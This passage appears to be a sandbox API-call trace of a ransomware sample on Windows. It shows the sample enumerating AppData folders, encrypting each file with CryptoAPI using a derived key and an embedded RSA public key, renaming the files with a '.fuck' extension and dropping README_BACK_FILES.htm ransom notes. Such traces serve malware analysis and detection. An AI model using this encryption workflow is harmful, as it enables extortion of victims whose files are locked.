hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.308] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.308] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.308] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.309] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.309] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.309] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.309] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.309] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.309] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.309] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.309] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.309] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.309] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.309] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.309] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.309] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.309] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x320, lpOverlapped=0x0) returned 1 [0242.310] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x320, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x330) returned 1 [0242.310] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x330, lpOverlapped=0x0) returned 1 [0242.310] CloseHandle (hObject=0x5d3c) returned 1 [0242.310] CloseHandle (hObject=0x5d40) returned 1 [0242.312] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc"), bFailIfExists=0) returned 1 [0242.319] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc", dwFileAttributes=0x0) returned 1 [0242.320] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc.gsg")) returned 1 [0242.322] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc.fuck")) returned 1 [0242.323] CryptDestroyHash (hHash=0x28bf018) returned 1 [0242.323] CryptDestroyKey (hKey=0x28e8078) returned 1 [0242.323] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0242.323] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0242.323] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0242.323] GetLastError () returned 0x0 [0242.323] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc")) returned 0x20 [0242.323] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc", dwFileAttributes=0x80) returned 1 [0242.324] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0242.324] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0242.325] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc.gsg", dwFileAttributes=0x2) returned 1 [0242.325] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f6348) returned 1 [0242.328] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0242.328] lstrlenA (lpString="cjCYuiydaGDqRLBosfDTjZpnzMlQm") returned 29 [0242.328] CryptHashData (hHash=0x28e7df8, pbData=0x2856f98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0242.328] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e7df8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x282de78) returned 1 [0242.329] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0242.329] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0242.329] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f47a8) returned 1 [0242.329] CryptImportPublicKeyInfo (in: hCryptProv=0x28f47a8, dwCertEncodingType=0x1, pInfo=0x2935fa0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2935fd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2935fd8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x282df78) returned 1 [0242.329] CryptEncrypt (in: hKey=0x282df78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0242.330] CryptEncrypt (in: hKey=0x282df78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f5ce8*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f5ce8*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0242.330] WriteFile (in: hFile=0x5d3c, lpBuffer=0x28f5ce8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x28f5ce8*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0242.334] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.352] CryptEncrypt (in: hKey=0x282de78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.352] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.364] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.364] CryptEncrypt (in: hKey=0x282de78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.364] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.364] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x374, lpOverlapped=0x0) returned 1 [0242.364] CryptEncrypt (in: hKey=0x282de78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x374, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.364] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.364] CloseHandle (hObject=0x5d40) returned 1 [0242.364] CloseHandle (hObject=0x5d3c) returned 1 [0242.365] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc"), bFailIfExists=0) returned 1 [0242.382] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc", dwFileAttributes=0x0) returned 1 [0242.382] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc.gsg")) returned 1 [0242.384] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc.fuck")) returned 1 [0242.385] CryptDestroyHash (hHash=0x28e7df8) returned 1 [0242.385] CryptDestroyKey (hKey=0x282de78) returned 1 [0242.385] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0242.385] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0242.385] FindClose (in: hFindFile=0x28bee18 | out: hFindFile=0x28bee18) returned 1 [0242.385] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\readme_back_files.htm")) returned 0xffffffff [0242.385] AreFileApisANSI () returned 1 [0242.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6fd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0242.385] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0242.389] GetFileType (hFile=0x5d44) returned 0x1 [0242.389] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0242.390] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0242.390] FindClose (in: hFindFile=0x28e7978 | out: hFindFile=0x28e7978) returned 1 [0242.390] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\readme_back_files.htm")) returned 0xffffffff [0242.391] AreFileApisANSI () returned 1 [0242.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0242.391] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d14 [0242.391] GetFileType (hFile=0x5d14) returned 0x1 [0242.391] WriteFile (in: hFile=0x5d14, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0242.393] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0242.393] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0242.393] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\readme_back_files.htm")) returned 0xffffffff [0242.393] AreFileApisANSI () returned 1 [0242.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6f28, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0242.393] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0242.395] GetFileType (hFile=0x5d10) returned 0x1 [0242.395] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d7f8*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d7f0, lpOverlapped=0x0 | out: lpBuffer=0x2b9d7f8*, lpNumberOfBytesWritten=0x2b9d7f0*=0x5ec, lpOverlapped=0x0) returned 1 [0242.396] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0242.397] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Application Data\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0xffffffff [0242.397] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Application Data\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\application data\\readme_back_files.htm")) returned 0xffffffff [0242.397] AreFileApisANSI () returned 1 [0242.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0242.397] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Application Data\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\application data\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0242.398] GetFileType (hFile=0x5d10) returned 0x1 [0242.398] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d7f8*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d7f0, lpOverlapped=0x0 | out: lpBuffer=0x2b9d7f8*, lpNumberOfBytesWritten=0x2b9d7f0*=0x5ec, lpOverlapped=0x0) returned 1 [0242.399] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0242.399] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\CEF\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x282e3b8 [0242.399] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0242.399] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0242.399] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\CEF\\User Data\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x282de78 [0242.399] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0242.399] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0242.399] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\CEF\\User Data\\Dictionaries\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28e88b8 [0242.399] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0242.400] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0242.400] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0242.400] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\CEF\\User Data\\Dictionaries\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\cef\\user data\\dictionaries\\readme_back_files.htm")) returned 0xffffffff [0242.400] AreFileApisANSI () returned 1 [0242.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28896f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0242.400] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\CEF\\User Data\\Dictionaries\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\cef\\user data\\dictionaries\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0242.401] GetFileType (hFile=0x5d44) returned 0x1 [0242.401] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0242.402] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0242.402] FindClose (in: hFindFile=0x282de78 | out: hFindFile=0x282de78) returned 1 [0242.402] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\CEF\\User Data\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\cef\\user data\\readme_back_files.htm")) returned 0xffffffff [0242.402] AreFileApisANSI () returned 1 [0242.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6fd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0242.403] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\CEF\\User Data\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\cef\\user data\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d14 [0242.403] GetFileType (hFile=0x5d14) returned 0x1 [0242.403] WriteFile (in: hFile=0x5d14, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0242.405] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0242.405] FindClose (in: hFindFile=0x282e3b8 | out: hFindFile=0x282e3b8) returned 1 [0242.405] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\CEF\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\cef\\readme_back_files.htm")) returned 0xffffffff [0242.405] AreFileApisANSI () returned 1 [0242.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: 